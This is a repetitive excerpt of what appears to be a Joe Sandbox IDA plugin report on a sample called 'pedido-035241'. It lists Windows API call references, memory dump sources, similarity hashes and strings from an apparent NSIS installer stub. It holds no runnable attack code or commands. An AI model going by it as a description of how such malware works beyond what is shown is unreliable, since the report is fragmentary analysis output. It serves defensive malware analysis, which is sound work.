• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
• Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
• Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
• Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 00402758
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
  • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
• Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
• Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
• Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
• CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
• CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
• CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-4010320282
• Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
• Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
• Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
• Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
• GetMessagePos.USER32 ref: 00404E41
• ScreenToClient.USER32(?,?), ref: 00404E5B
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
• Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
• Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
• Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
• MulDiv.KERNEL32(0010A87B,00000064,?), ref: 00402FDC
• wsprintfW.USER32 ref: 00402FEC
• SetWindowTextW.USER32(?,?), ref: 00402FFC
• SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
Strings
• verifying installer: %d%%, xrefs: 00402FE6
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
• Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
• Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
• Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2667972263-0
                                                                                                                                                                            • Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                                                                                                                                                            • Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
                                                                                                                                                                            • Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                                                                                                                                                            • Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1354259210-0
                                                                                                                                                                            • Opcode ID: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
                                                                                                                                                                            • Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
                                                                                                                                                                            • Opcode Fuzzy Hash: 62511f10878039b6ed18a28c82f1f53e035507c0486d8d62b001bc606e677df7
                                                                                                                                                                            • Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                            • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                                                                                                                                            • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                                                                                                                                                                            • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2584051700-0
                                                                                                                                                                            • Opcode ID: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                            • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                                                                                                                                                                            • Opcode Fuzzy Hash: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                            • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
• Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
• Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
• Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
APIs
• lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
• wsprintfW.USER32 ref: 00404DBA
• SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
• Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
• Opcode Fuzzy Hash: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
• Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
APIs
• lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
• CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
• lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 2659869361-3081826266
• Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
• Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
• Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
• Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
APIs
• DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
• GetTickCount.KERNEL32 ref: 0040304A
• CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
• ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
• Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
• Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
• Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
APIs
  • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
  • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
• lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
• GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
Memory Dump Source
• Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
